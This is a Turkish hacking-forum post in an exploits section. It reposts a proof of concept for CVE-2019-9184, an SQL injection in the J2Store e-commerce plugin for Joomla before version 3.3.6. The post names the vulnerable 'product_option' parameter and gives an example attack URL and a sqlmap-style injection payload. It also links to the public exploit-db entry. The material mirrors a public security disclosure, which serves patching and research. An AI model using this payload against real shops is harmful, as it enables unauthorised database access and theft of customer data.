İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

J2Store Plugin for Joomla! < 3.3.6 - SQL Injection

28-02-2019 19:23
#1
Ludas - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
Ludas.py
Yaş:
19
Mesajlar:
216
Teşekkür (Etti):
27
Teşekkür (Aldı):
39
Konular:
28
Ticaret:
(0) %
# Exploit başlığı: J2Store Plugin for Joomla! < 3.3.6 - SQL Injection

# Tarih: 19/02/2019

# Yazar: Andrei Conache

# Twitter: @andrei_conache

# Contact: andrei.conache[at]protonmail.com

# Yazılım linki: https://www.j2store.org

# Versiyon: 3.x-3.3.6

# Tested on: Linux

#CVE: CVE-2019-9184





1. Açıklama:
J2Store Joomla için en popüler alışveriş/e-ticaret uzantısıdır. Bulunan SQL enjeksiyonu, herhangi bir ziyaretçinin rasgele sorguları web sitesinde çalştırmasına izn verir.









2. Proof of Concept (PoC):

- Parameter vulnerable: "product_option[j]" array (where j depends on entries)

- Example: [URL]/index.php?option=com_j2store&view=product&task=upd ate&product_option[j]=%27%22%3E2&product_qty=1&product_id=XX&option=com _j2store&ajax=0&_=XXXXXXXXXX

- sqlmap: product_option[j]=%28CASE%20WHEN%20%284862%3D4862%29%20THEN%204862% 20ELSE%204862%2A%28SELECT%204862%20FROM%20DUAL%20U NION%20SELECT%205348%20FROM%20DUAL%29%20END%29



Exploit : https://www.exploit-db.com/exploits/46467
Kullanıcı İmzası

|~ Yalnızlık olsun istediğin, uzaya mahkum ederim. ~|

Telegram ⋟ @Ludas_THT

|~ Vaktimiz doldu, artık gözlerin kapalı. ~|


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı